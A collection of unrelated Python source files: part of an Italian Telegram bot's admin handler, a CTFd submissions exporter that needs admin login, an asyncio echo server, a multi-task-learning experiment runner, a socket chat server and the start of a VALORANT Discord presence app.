chat_id, "Il canale <code>{}</code> non è stato aggiunto in lista".format(fixed_username), parse_mode="HTML")
else:
print("Il canale " + fixed_username + " è già presente!")
bot.sendMessage(
chat_id, "Il canale <code>{}</code> è già presente nella lista!".format(fixed_username), parse_mode="HTML")
# removes a channel in a file
# syntax /admin canale elimina |username canale| IN ALTERNATIVA
# syntax /admin canale rimuovi |username canale|
elif azione[0].lower() == "elimina" or azione[0].lower() == "rimuovi" and len(azione) == 2:
try:
liste["channels"].pop(fix_username(azione[1]))
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id, "Canale <code>{}</code> rimosso correttamente".format(azione[1].lower()), parse_mode="HTML")
except Exception as exception_value:
print("Excep:28 -> {}".format(exception_value))
log("Except:28 -> {}".format(exception_value), True)
bot.sendMessage(
chat_id, "Il canale <code>{}</code> non è stato rimosso dalla lista".format(azione[1].lower()), parse_mode="HTML")
# canale |canale| |messaggio| => invia il messaggio a quel canale
# syntax: /admin canale | canale | |Messaggio da inviare in un canale|"
# syntax: /admin canale broadcast |Messaggio da inviare in tutti i canali|"
elif len(azione) >= 2 or len(azione) >= 1:
messaggio = ""
# check: empty channels
if len(liste["channels"]) == 0:
bot.sendMessage(
chat_id,
"Lista canali vuota! Impossibile inviare un messaggio!",
parse_mode="HTML")
print("Lista canali vuota! Impossibile inviare un messaggio!")
else:
if azione[0].lower() == "broadcast":
del azione[0]
messaggio = ' '.join(azione)
if messaggio != "":
for channel_name in liste["channels"].keys():
send_message_channel(
channel_name, messaggio, chat_id, "Messaggio non inviato in ")
else:
bot.sendMessage(
chat_id,
"Messaggio vuoto. Impossibile procedere.",
parse_mode="HTML")
print("Messaggio vuoto. Impossibile procedere.")
else:
# it is not a broadcast message
channel_name = fix_username(azione[0])
del azione[0]
messaggio = ' '.join(azione)
if messaggio != "":
send_message_channel(
channel_name, messaggio, chat_id)
else:
bot.sendMessage(
chat_id,
"Messaggio vuoto. Impossibile procedere.",
parse_mode="HTML")
else:
print("Comando non riconosciuto.")
admin_err1 = True
# /admin all users
elif azione[1].lower() == "all" and azione[2].lower() == "users" and len(azione) >= 4:
# Azioni sugli avvisi importanti (tutti gli utenti)
del azione[0]
del azione[0]
del azione[0]
messaggio = ' '.join(azione)
bot.sendMessage(
chat_id,
"<i>Invio del messaggio in corso...\nRiceverai un messaggio quando finisce l'invio.</i>",
parse_mode="HTML")
remove_these_users = []
for value_for in all_users:
time.sleep(.3)
try:
bot.sendMessage(
value_for,
"<b>Messaggio importante</b>\n" + messaggio,
parse_mode="HTML")
print(" >> Messaggio inviato alla chat: " + str(value_for))
'''bot.sendMessage(
chat_id, "✔️ Messaggio inviato alla chat: <a href='tg://user?id=" + str(value_for) + "'>" +
str(value_for) + "</a>",
parse_mode="HTML")'''
except Exception as exception_value:
print("Excep:07 -> " + str(exception_value))
log("Except:07 ->" +
str(exception_value), True)
remove_these_users.append(value_for)
for value_to_remove in remove_these_users:
remove_user_from_avvisi_allusers_lists(
chat_id, value_to_remove)
bot.sendMessage(
chat_id,
"Messaggio inviato correttamente a tutti gli utenti.\n\nIl messaggio inviato è:\n" +
messaggio,
parse_mode="HTML")
elif azione[1].lower() == "avvisi" and azione[2].lower() == "list" and len(azione) >= 4:
# Azioni sugli utenti (chat_id) presenti in avvisi_on_list.json
if azione[3].lower() == "mostra":
bot.sendMessage(
chat_id, "Ecco la 'avvisi_on_list':\n\n" + str(avvisi_on_list))
elif azione[3].lower() == "aggiungi":
del azione[0]
del azione[0]
del azione[0]
del azione[0]
temp_chat_id = int(azione[0])
if temp_chat_id not in avvisi_on_list:
avvisi_on_list.append(temp_chat_id)
try:
with open(avvisi_on_list_path, "wb") as file_with:
file_with.write(json.dumps(
avvisi_on_list).encode("utf-8"))
bot.sendMessage(
chat_id,
"La chat_id '" +
str(temp_chat_id) +
"' è stata inserita correttamente.")
except Exception as exception_value:
print("Excep:12 -> " + str(exception_value))
log("Except:12 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'avvisi_on_list.json'.")
else:
bot.sendMessage(
chat_id,
"La chat_id '" +
str(temp_chat_id) +
"' è già presente.")
elif azione[3].lower() == "elimina":
del azione[0]
del azione[0]
del azione[0]
del azione[0]
temp_chat_id = int(azione[0])
if temp_chat_id in avvisi_on_list:
avvisi_on_list.remove(temp_chat_id)
try:
with open(avvisi_on_list_path, "wb") as file_with:
file_with.write(json.dumps(
avvisi_on_list).encode("utf-8"))
bot.sendMessage(
chat_id,
"La chat_id '" +
str(temp_chat_id) +
"' è stata eliminata correttamente.")
except Exception as exception_value:
print("Excep:13 -> " + str(exception_value))
log("Except:13 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'avvisi_on_list.json'.")
else:
bot.sendMessage(
chat_id,
"La chat_id '" +
str(temp_chat_id) +
"' non è stata trovata.")
else:
admin_err1 = True
elif azione[1].lower() == "progetto" and azione[2].lower() == "mozita" and len(azione) >= 5:
# Azioni sui progetti comunitari (mozilla italia)
if azione[3].lower() == "aggiungi":
del azione[0]
del azione[0]
del azione[0]
del azione[0]
link = azione[-1]
del azione[-1]
nome = ' '.join(azione)
if not nome in liste["progetti_mozita"]:
liste["progetti_mozita"][nome] = str(link)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id,
"Progetto comunitario '" +
str(nome) +
"' (" +
str(link) +
") inserito correttamente.")
except Exception as exception_value:
print("Excep:17 -> " + str(exception_value))
log("Except:17 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'progetti_mozita_list.json'.")
else:
bot.sendMessage(chat_id, "Il progetto comunitario '" +
str(nome) + "' è già presente.")
elif azione[3].lower() == "modifica":
del azione[0]
del azione[0]
del azione[0]
del azione[0]
link = azione[-1]
del azione[-1]
nome = ' '.join(azione)
if nome in liste["progetti_mozita"]:
liste["progetti_mozita"][nome] = str(link)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id,
"Progetto '" +
str(nome) +
"' (" +
str(link) +
") modificato correttamente.")
except Exception as exception_value:
print("Excep:18 -> " + str(exception_value))
log("Except:18 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'progetti_mozita_list.json'.")
else:
bot.sendMessage(chat_id, "Il progetto comunitario '" +
str(nome) + "' non è stato trovato.")
elif azione[3].lower() == "elimina":
del azione[0]
del azione[0]
del azione[0]
del azione[0]
nome = ' '.join(azione)
if nome in liste["progetti_mozita"]:
liste["progetti_mozita"].pop(nome)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id, "Progetto comunitario '" + str(nome) + "' eliminato correttamente.")
except Exception as exception_value:
print("Excep:19 -> " + str(exception_value))
log("Except:19 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'progetti_mozita_list.json'.")
else:
bot.sendMessage(chat_id, "Il progetto '" +
str(nome) + "' non è stato trovato.")
else:
admin_err1 = True
elif azione[1].lower() == "progetto" and len(azione) >= 4:
# Azione sui progetti (mozilla)
if azione[2] == "aggiungi":
del azione[0]
del azione[0]
del azione[0]
link = azione[-1]
del azione[-1]
nome = ' '.join(azione)
if not nome in liste["progetti"]:
liste["progetti"][nome] = str(link)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id,
"Progetto '" +
str(nome) +
"' (" +
str(link) +
") inserito correttamente.")
except Exception as exception_value:
print("Excep:17 -> " + str(exception_value))
log("Except:17 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'progetti_list.json'.")
else:
bot.sendMessage(chat_id, "Il progetto '" +
str(nome) + "' è già presente.")
elif azione[2].lower() == "modifica":
del azione[0]
del azione[0]
del azione[0]
link = azione[-1]
del azione[-1]
nome = ' '.join(azione)
if nome in liste["progetti"]:
liste["progetti"][nome] = str(link)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id,
"Progetto '" +
str(nome) +
"' (" +
str(link) +
") modificato correttamente.")
except Exception as exception_value:
print("Excep:18 -> " + str(exception_value))
log("Except:18 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'progetti_list.json'.")
else:
bot.sendMessage(chat_id, "Il progetto '" +
str(nome) + "' non è stato trovato.")
elif azione[2].lower() == "elimina":
del azione[0]
del azione[0]
del azione[0]
nome = ' '.join(azione)
if nome in liste["progetti"]:
liste["progetti"][nome] = str(link)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id, "Progetto '" + str(nome) + "' eliminato correttamente.")
except Exception as exception_value:
print("Excep:19 -> " + str(exception_value))
log("Except:19 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'progetti_list.json'.")
else:
bot.sendMessage(chat_id, "Il progetto '" +
str(nome) + "' non è stato trovato.")
else:
admin_err1 = True
elif azione[1].lower() == "collaboratore":
# Azione sui collaboratori
if azione[2].lower() == "aggiungi" and len(azione) >= 5:
del azione[0]
del azione[0]
del azione[0]
username = azione[-1]
del azione[-1]
nome = ' '.join(azione)
if not username in liste["collaboratori"]:
liste["collaboratori"][fix_username(username)] = str(nome)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id, "'" + str(nome) + "' aggiunto correttamente ai collaboratori.")
except Exception as exception_value:
print("Excep:20 -> " + str(exception_value))
log("Except:20 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'collaboratori_hub.json'.")
else:
bot.sendMessage(chat_id, "'" + str(nome) + "' è già presente nella lista dei collaboratori.")
elif azione[2].lower() == "elimina" or azione[2].lower() == "rimuovi":
del azione[0]
del azione[0]
del azione[0]
username = ' '.join(azione)
if fix_username(username) in liste["collaboratori"]:
liste["collaboratori"].pop(fix_username(username))
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id, "'" + str(username) + "' rimosso correttamente dai collaboratori.")
except Exception as exception_value:
print("Excep:21 -> " + str(exception_value))
log("Except:21 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'collaboratori_hub.json'.")
else:
bot.sendMessage(
chat_id, "'" + str(username) + "' non è presente nella lista dei collaboratori.")
else:
admin_err1 = True
elif azione[1].lower() == "scarica" and len(azione) == 5:
# Azione per scaricare file di log -> esempio: /admin scarica 2019 10 20
nome_file = "log_" + azione[2] + "_" + \
azione[3] + "_" + azione[4] + ".txt"
send_log(nome_file, chat_id)
elif azione[1].lower() == "scarica" and azione[2].lower() == "today":
# Azione per scaricare file di log di oggi
nome_file = "log_" + data_salvataggio + ".txt"
send_log(nome_file, chat_id)
elif azione[1].lower() == "scarica" and azione[2].lower() == "yesterday":
# Azione per scaricare file di log di ieri
yesterday_time = datetime.now() - timedelta(days = 1)
data_ieri = yesterday_time.strftime("%Y_%m_%d")
nome_file = "log_" + data_ieri + ".txt"
send_log(nome_file, chat_id)
else:
admin_err1 = True
else:
bot.sendMessage(
chat_id,
"Errore: Comando non riconosciuto.\nPer scoprire tutti i comandi consentiti in questa sezione digita /admin",
parse_mode="HTML")
if admin_err1:
bot.sendMessage(
chat_id,
"Questo comando nella sezione ADMIN non è stato riconosciuto.\n\nPer scoprire tutti i comandi consentiti in questa sezione digita /admin",
parse_mode="HTML")
try:
# stringa stampata a terminale, per ogni operazione effettuata
stampa = str(localtime) + " -- Utente: " + str(user_name) + " (" + str(user_id) + ")[" + str(
status_user) + "] -- Chat: " + str(
chat_id) + "\n >> >> Tipo messaggio: " + str(type_msg) + "\n >> >> Contenuto messaggio: " + str(
text)
print(stampa + "\n--------------------\n")
log(stampa, False)
except Exception as exception_value:
stampa = "Excep:01 -> " + \
str(exception_value) + "\n--------------------\n"
print(stampa)
log("Except:01 ->" + str(exception_value), True)
# Start the bot and register the handler for both plain chat messages and
# inline-keyboard callback queries; any startup failure is printed and logged
# (the keep-alive loop below still runs so the process does not exit).
try:
    bot = telepot.Bot(TOKEN)
    MessageLoop(
        bot, {'chat': risposte, 'callback_query': risposte}).run_as_thread()
except Exception as exception_value:
    print("ERRORE GENERALE.\n\nError: " +
          str(exception_value) + "\n--------------------\n")
    log("ERRORE GENERALE.\n\nError: " + str(exception_value), True)
# keeps the bot alive
# Sleep in the loop instead of `while True: pass`, which busy-spun a CPU
# core at 100% while doing no work. The handler runs in its own thread,
# so sleeping here changes nothing visible to users.
while True:
    time.sleep(10)
|
ctfdumper.py | import requests, queue, re, urllib.parse, json, threading, tqdm, time
import pandas as pd
class CTFDumper:
    """Dump all submissions (joined with user names) from a CTFd instance.

    Pages of the `/api/v1/submissions` and `/api/v1/users` endpoints are
    fetched concurrently by a pool of worker threads communicating over
    queues; results are merged into a single pandas DataFrame.
    """

    def __init__(self, url, threads=10):
        """Prepare queues and settings.

        Args:
            url: Base URL of the CTFd site (no trailing slash).
            threads: Number of fetcher threads to spawn.
        """
        self.url = url
        self.threads_num = threads
        self.tasks = queue.Queue()                # work items for the fetchers
        self.results_submissions = queue.Queue()  # lists of parsed submission dicts
        self.results_users = queue.Queue()        # (user_id, user_name) tuples

    def _worker(self):
        """Thread body: consume tasks until a `None` sentinel is received."""

        def get_submission_data(submission_task):
            # Fetch and parse one page of the submissions endpoint.
            page_num = submission_task['page_num']
            r = self._s.get(self.url + '/api/v1/submissions?page={}'.format(page_num))
            try:
                results = json.loads(r.text)
            except ValueError:
                # Non-JSON response (e.g. error page): skip this page.
                # (json.JSONDecodeError is a subclass of ValueError.)
                return
            parsed_submissions = []
            for entry_data in results['data']:
                parsed_submissions.append({
                    'user_id': entry_data['user_id'],
                    'challenge_name': entry_data['challenge']['name'],
                    'challenge_category': entry_data['challenge']['category'],
                    'type': entry_data['type'],
                    'provided': entry_data['provided'],
                    'date': entry_data['date'],
                })
            self.results_submissions.put(parsed_submissions)

        def get_username(userid_task):
            # Fetch one page of the users endpoint and emit (id, name) pairs.
            user_page = userid_task['user_page']
            r = self._s.get(self.url + '/api/v1/users?page={}'.format(user_page))
            try:
                results = json.loads(r.text)
            except ValueError:
                return
            for user_data in results['data']:
                self.results_users.put((user_data['id'], user_data['name']))

        while True:
            task = self.tasks.get()
            if task is None:  # sentinel: shut this worker down
                break
            if "page_num" in task:
                get_submission_data(task)
            else:
                get_username(task)
            self.tasks.task_done()

    def get_submissions(self, username, password):
        """Log in and return a DataFrame of submissions, or None if there are none.

        Args:
            username: CTFd account name (needs access to the submissions API,
                i.e. an admin account).
            password: Account password.

        Returns:
            pandas.DataFrame with one row per submission (including the
            resolved `username` column), or None when no submissions exist.

        Raises:
            Exception: on login failure or missing API access.
        """
        self._s = requests.session()
        r = self._s.get(self.url + "/login")
        # CTFd embeds a CSRF nonce in the login form; extract and replay it.
        nonce = re.search(r'<input id="nonce" name="nonce" type="hidden" value="(.*?)">', r.text).group(1)
        payload = {
            "name": username,
            "password": password,
            "_submit": "Submit",
            "nonce": nonce,
        }
        r = self._s.post(self.url + "/login",
                         params={'next': '/challenges'},
                         data=payload)
        # A successful login redirects to /challenges.
        if not r.ok or urllib.parse.urlparse(r.url).path != '/challenges':
            raise Exception("Could not login to the CTFD site: {}".format(self.url))
        r = self._s.get(self.url + "/api/v1/submissions")
        if r.status_code != 200:
            raise Exception("Could not access submission api endpoint! You probably do not have access.")
        total_pages = json.loads(r.text)['meta']['pagination']['pages']
        r = self._s.get(self.url + "/api/v1/users")
        if r.status_code != 200:
            raise Exception("Could not access submission users endpoint! You probably do not have access.")
        total_user_pages = json.loads(r.text)['meta']['pagination']['pages']

        total_tasks = total_pages + total_user_pages
        prog_bar = tqdm.tqdm(total=total_tasks)
        threads = [threading.Thread(target=self._worker, daemon=True)
                   for _ in range(self.threads_num)]
        for t in threads:
            t.start()
        for page_num in range(1, total_pages + 1):
            self.tasks.put({'page_num': page_num})
        for user_page in range(1, total_user_pages + 1):
            self.tasks.put({'user_page': user_page})

        # Poll the queue size purely to drive the progress bar.
        prev_tasks_left = total_tasks
        while True:
            curr_tasks_left = self.tasks.qsize()
            prog_bar.update(prev_tasks_left - curr_tasks_left)
            prog_bar.refresh()
            if curr_tasks_left == 0:
                break
            prev_tasks_left = curr_tasks_left
            time.sleep(0.0001)
        self.tasks.join()
        # One sentinel per worker, then wait for them to exit (the original
        # joined the threads a second time on the empty-result path — removed).
        for _ in threads:
            self.tasks.put(None)
        for t in threads:
            t.join()

        user_map = {}
        while not self.results_users.empty():
            user_id, user_name = self.results_users.get()
            user_map[user_id] = user_name
            self.results_users.task_done()

        if self.results_submissions.empty():
            return None

        # Build one DataFrame in a single pass. The original accumulated via
        # DataFrame.append(), which was removed in pandas 2.0.
        rows = []
        while not self.results_submissions.empty():
            for submission in self.results_submissions.get():
                # Drop submissions whose user id has no known name (matches the
                # original's silent KeyError skip).
                if submission['user_id'] in user_map:
                    submission['username'] = user_map[submission['user_id']]
                    rows.append(submission)
            self.results_submissions.task_done()
        return pd.DataFrame(rows)
|
TCP_server_asyncio.py | import socket
import threading
import asyncio
import platform
class Server:
    """TCP server that upper-cases client data, one asyncio task per client.

    A background thread runs the event loop; the main thread blocks in
    accept() and schedules a handler coroutine for each connection.
    """

    def __init__(self):
        # Bug fix: the original called setblocking(False) on the listening
        # socket, which makes the blocking-style accept() in server_sock()
        # raise BlockingIOError immediately. The socket must stay in its
        # default blocking mode for this design to work.
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server.bind(('0.0.0.0', 8000))
        self.server.listen(1)

    async def start_new_socket(self, sock, addr):
        """Serve one client: echo each message upper-cased until 'close'.

        Caveat (unchanged from original): sock.recv() is a blocking call, so
        an idle client stalls the shared event loop for everyone.
        """
        try:
            while True:
                data = str(sock.recv(1024), encoding="utf8")
                if 'close' in data:
                    sock.send(b'close')
                    break
                print('收到客户端发来的数据:{}'.format(data))
                deal_data = data.upper()
                sock.send(deal_data.encode('utf8'))
            # current_thread() replaces the deprecated currentThread() alias.
            print('正常断开{}'.format(threading.current_thread()))
            sock.close()
        except ConnectionResetError:
            print('断开连接')

    def start_loop(self, loop):
        """Adopt *loop* in the calling thread and run it forever."""
        asyncio.set_event_loop(loop)
        loop.run_forever()

    def server_sock(self):
        """Accept connections forever, dispatching each onto the event loop."""
        print("开始监听")
        # platform.architecture() stringifies to e.g. "('64bit', 'WindowsPE')";
        # the 'Win' substring check selects the Windows Proactor loop.
        if 'Win' in str(platform.architecture()):
            loop = asyncio.ProactorEventLoop()
        else:
            import uvloop
            loop = uvloop.new_event_loop()
        threading.Thread(target=self.start_loop, args=(loop,)).start()
        while True:
            sock, addr = self.server.accept()
            print('开始建立连接')
            asyncio.run_coroutine_threadsafe(self.start_new_socket(sock, addr), loop)
if __name__ == '__main__':
    # Construct the server (binds 0.0.0.0:8000 at init) and block forever
    # in the accept loop.
    server = Server()
    server.server_sock()
main.py | # Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Main file for running experiments..
"""
import importlib
import os
import subprocess
from mtl.config.opts import parser
import numpy as np
import torch
import torch.multiprocessing as mp
from tqdm import tqdm
def train(opt):
  """Run standard network training loop.

  Loads the dataset and task modules named in `opt`, then alternates
  train/valid splits for `opt.num_rounds` rounds, saving a snapshot and the
  round counter after each round. May stop early when the validation score
  drops below `opt.early_stop_thr`.

  Args:
    opt: All experiment and training options (see mtl/config/opts).
  """
  if opt.fixed_seed:
    print('Fixing random seed')
    np.random.seed(9999)
    torch.manual_seed(9999)
    torch.cuda.manual_seed(9999)
    torch.backends.cudnn.deterministic = True

  # Dataset and task are resolved dynamically from the option strings.
  ds = importlib.import_module('mtl.util.datasets.' + opt.dataset)
  ds, dataloaders = ds.initialize(opt)
  task = importlib.import_module('mtl.train.' + opt.task)
  sess = task.Task(opt, ds, dataloaders)
  sess.cuda()

  splits = [s for s in ['train', 'valid'] if opt.iters[s] > 0]
  start_round = opt.last_round - opt.num_rounds

  # Main training loop
  for round_idx in range(start_round, opt.last_round):
    sess.valid_accuracy_track = [[] for _ in range(sess.num_tasks)]
    for split in splits:
      print('Round %d: %s' % (round_idx, split))
      train_flag = split == 'train'
      sess.set_train_mode(train_flag)
      if split == 'valid':
        sess.prediction_ref = [{} for _ in range(sess.num_tasks)]
      for step in tqdm(range(opt.iters[split]), ascii=True):
        global_step = step + round_idx * opt.iters[split]
        sess.run(split, global_step)
        if train_flag: sess.update_weights()
        if (split == 'train' and opt.drop_learning_rate
            and global_step in opt.drop_learning_rate):
          opt.learning_rate /= opt.drop_lr_factor
          print('Dropping learning rate to %.2f' % opt.learning_rate)
          for opt_key in sess.checkpoint_ref['optim']:
            for p in sess.__dict__[opt_key].param_groups:
              p['lr'] = opt.learning_rate
        # Update Tensorboard every 500 steps (every 50 during validation).
        # Bug fix: the original tested `global_step % 50` (truthy), which
        # logged on every step NOT divisible by 50.
        if global_step % 500 == 0 or (split == 'valid' and global_step % 50 == 0):
          for i in range(len(ds[split])):
            sess.tb.update(ds[split][i].task_name, split, global_step,
                           sess.get_log_vals(split, i))
      torch.save({'preds': sess.prediction_ref},
                 '%s/final_predictions' % opt.exp_dir)
    # Update accuracy history: overall score is the mean of per-task means.
    sess.score = np.array([np.array(a).mean()
                           for a in sess.valid_accuracy_track]).mean()
    print('Score:', sess.score)
    for i in range(sess.num_tasks):
      for s in splits:
        if s == 'valid':
          tmp_acc = np.array(sess.valid_accuracy_track[i]).mean()
          sess.log['accuracy'][i][s] = tmp_acc
        sess.log['accuracy_history'][i][s] += [sess.log['accuracy'][i][s]]
    sess.save(opt.exp_dir + '/snapshot')
    # Persist the next round index so a restarted job resumes correctly.
    with open(opt.exp_dir + '/last_round', 'w') as f:
      f.write('%d\n' % (round_idx + 1))
    if (opt.iters['valid'] > 0 and sess.score < opt.early_stop_thr):
      break
def worker(opt, p_idx, cmd_queue, result_queue, debug_param):
  """Worker thread for managing parallel experiment runs.

  Consumes messages of the form (exp_count, mode, cmd, extra_args) from
  cmd_queue until the 'DONE' sentinel arrives, and pushes
  [exp_id, result, exp_count] onto result_queue for each one.

  Args:
    opt: Experiment options
    p_idx: Process index
    cmd_queue: Queue holding experiment commands to run
    result_queue: Queue to submit experiment results
    debug_param: Shared target for debugging meta-optimization
  """
  # Round-robin GPU assignment across worker processes.
  gpus = list(map(int, opt.gpu_choice.split(',')))
  gpu_choice = gpus[p_idx % len(gpus)]
  # Re-seed from OS entropy so forked workers don't share an RNG stream.
  np.random.seed()
  try:
    while True:
      msg = cmd_queue.get()
      if msg == 'DONE': break
      exp_count, mode, cmd, extra_args = msg
      if mode == 'debug':
        # Basic operation for debugging/sanity checking optimizers:
        # score = negative distance between the proposed parameters and the
        # hidden target (upper triangle only), plus simulated eval noise.
        exp_id, param = cmd
        pred_param = param['partition'][0]
        triu_ = torch.Tensor(np.triu(np.ones(debug_param.shape)))
        score = -np.linalg.norm((debug_param - pred_param)*triu_)
        score += np.random.randn() * opt.meta_eval_noise
        tmp_acc = {'accuracy': [{'valid': score} for i in range(10)]}
        result = {'score': score, 'log': tmp_acc}
      elif mode == 'cmd':
        # Run a specified command as a subprocess (a full training run).
        tmp_cmd = cmd
        if opt.distribute:
          tmp_cmd += ['--gpu_choice', str(gpu_choice)]
        tmp_cmd += extra_args
        # The experiment id follows the '-e' flag in the command line.
        exp_id = tmp_cmd[tmp_cmd.index('-e') + 1]
        print('%d:' % p_idx, ' '.join(tmp_cmd))
        subprocess.call(tmp_cmd)
        # Collect result from the snapshot the training run wrote to disk.
        log_path = '%s/%s/snapshot_extra' % (opt.exp_root_dir, exp_id)
        try:
          result = torch.load(log_path)
        except Exception as e:
          # A failed/killed run leaves no snapshot; report None upstream.
          print('Error loading result:', repr(e))
          result = None
        if opt.cleanup_experiment:
          # Remove extraneous files that take up disk space
          exp_dir = '%s/%s' % (opt.exp_root_dir, exp_id)
          cleanup_paths = [exp_dir + '/snapshot_optim',
                           exp_dir + '/snapshot_model']
          dir_files = os.listdir(exp_dir)
          tfevent_files = ['%s/%s' % (exp_dir, fn)
                           for fn in dir_files if 'events' in fn]
          cleanup_paths += tfevent_files
          for cleanup in cleanup_paths:
            subprocess.call(['rm', cleanup])
      result_queue.put([exp_id, result, exp_count])
  except KeyboardInterrupt:
    print('Keyboard interrupt in process %d' % p_idx)
  finally:
    print('Exiting process %d' % p_idx)
def main():
  """Entry point: run meta-optimization (opt.is_meta) or one training run."""
  # Parse command line options
  opt = parser.parse_command_line()
  # Set GPU
  os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpu_choice
  if opt.is_meta:
    # Initialize queues shared with the worker processes.
    cmd_queue = mp.Queue()
    result_queue = mp.Queue()
    # Set up target debug params (hidden target recovered by 'debug'-mode
    # workers to sanity-check the meta optimizer).
    debug_param = torch.rand(2, 10, 10)
    # Start workers (daemonized so they die with the parent).
    workers = []
    for i in range(opt.num_procs):
      worker_args = (opt, i, cmd_queue, result_queue, debug_param)
      worker_p = mp.Process(target=worker, args=worker_args)
      worker_p.daemon = True
      worker_p.start()
      workers += [worker_p]
    # Initialize and run meta optimizer (resolved dynamically by name).
    metaoptim = importlib.import_module('mtl.meta.optim.' + opt.metaoptimizer)
    metaoptim = metaoptim.MetaOptimizer(opt)
    metaoptim.run(cmd_queue, result_queue)
    # Clean up workers: one 'DONE' sentinel per process, then join them all.
    for i in range(opt.num_procs):
      cmd_queue.put('DONE')
    for worker_p in workers:
      worker_p.join()
  else:
    # Run standard network training
    train(opt)


if __name__ == '__main__':
  main()
|
server.py | import socket
from threading import *
import time
# Registry of currently connected client sockets, shared by every handler
# thread (appends/removes are effectively atomic under the GIL).
clients = []
# Detect the local IP address (no packet is actually sent).
def get_ip():
    """Best-effort LAN IP discovery.

    Connecting a UDP socket makes the OS pick an outbound interface;
    getsockname() then reveals that interface's address. Falls back to
    127.0.0.1 when no route is available.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # doesn't even have to be reachable
        s.connect(('10.255.255.255', 1))
        IP = s.getsockname()[0]
    except OSError:
        # Narrowed from a bare `except:` — only socket/OS errors are expected.
        IP = '127.0.0.1'
    finally:
        s.close()
    return IP
# Set the connection variables
ip = get_ip()
port = 1234
# Server object (TCP over IPv4)
server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# Bind the selected port to this process
server_socket.bind( (ip,port) )
# Start listening; allow a backlog of up to 5 pending connections
server_socket.listen(5)
print("Server %s is running on port %s..." % (ip,str(port)))
# Broadcast a chat line to every connected client.
# (Note: despite the original comment, this includes the sender — every
# socket in `clients` receives the message.)
def broadcast(message):
    """Encode *message* as UTF-8 and send it to all sockets in `clients`."""
    payload = message.encode('utf-8')
    for peer in clients:
        peer.sendall(payload)
# Manage the data that comes to the server from one client.
def serviClient(client_socket):
    """Per-client handler thread: relay chat messages until the client leaves.

    The first message (up to 100 bytes) is the client's display name; every
    later message is re-broadcast to all clients. The session ends on an
    explicit 'exit()' message or when the peer disconnects.
    """
    name = client_socket.recv(100).decode('utf_8')
    broadcast("<< %s entered the chat room! >>" % (name))
    print("<< %s entered the chat room! >>" % (name))
    while True:
        try:
            message = client_socket.recv(100).decode('utf_8')
        except (ConnectionResetError, OSError):
            # Bug fix: an abrupt disconnect used to kill this thread with an
            # unhandled exception, leaving the dead socket in `clients`.
            message = ''
        if message == 'exit()' or not message:
            # Bug fix: recv() returning '' means the peer closed the
            # connection; the original looped forever broadcasting empty
            # lines in that case.
            if client_socket in clients:
                clients.remove(client_socket)
            broadcast("<< %s left the chat room! >>" % (name))
            print("<< %s left the chat room! >>" % (name))
            break
        else:
            broadcast("%s: %s" % (name, message))
            print("%s: %s" % (name, message))
        time.sleep(1)  # original per-message throttle, kept as-is
    client_socket.close()
# Accept clients forever; each connection gets its own handler thread.
while True:
    client_socket,client_ip = server_socket.accept()
    # accept() always returns a socket object; the check is kept from the
    # original as a defensive no-op.
    if client_socket:
        clients.append(client_socket)
        Thread(target = serviClient, args = (client_socket,)).start()
|
main.py | print("""
[VALORANT-RPC] by restrafes
The source code for this project can be found at: https://github.com/restrafes/valorant-rpc
""")
# import libraries
import os, sys, psutil, traceback
import asyncio, threading
import pypresence, time
import json
from psutil import AccessDenied
from utils import open_game_client, get_lockfile, get_session, get_presence, get_game_presence, parse_time, to_map_name
from exception import RiotAuthError, RiotRefuseError
import pystray, ctypes
from pystray import Icon as icon, Menu as menu, MenuItem as item
from PIL import Image, ImageDraw
from tkinter import Tk, PhotoImage, messagebox
if __name__ == "__main__":
    # load configuration
    # NOTE(review): `global` at module level is a no-op; kept as-is.
    global config, rpc, systray, systray_thread
    # window for messageboxes (and maybe other things in the future???)
    tkinter_window = Tk()
    tkinter_window.iconphoto(False, PhotoImage(file="resources/favicon.png"))
    tkinter_window.withdraw() # hide root window
    try:
        # open config
        with open("config.json", "r") as config_file:
            config = json.load(config_file)
            config_file.close()
        # main exit process method
        def exit_program():
            # Close the Discord RPC connection, stop the tray icon, then exit.
            global systray, rpc
            rpc.close()
            systray.stop()
            sys.exit() # close the process
        # hide the console window if debug is off
        window_shown = config["debug"]
        kernel32, user32 = ctypes.WinDLL('kernel32'), ctypes.WinDLL('user32')
        if not config["debug"]:
            try:
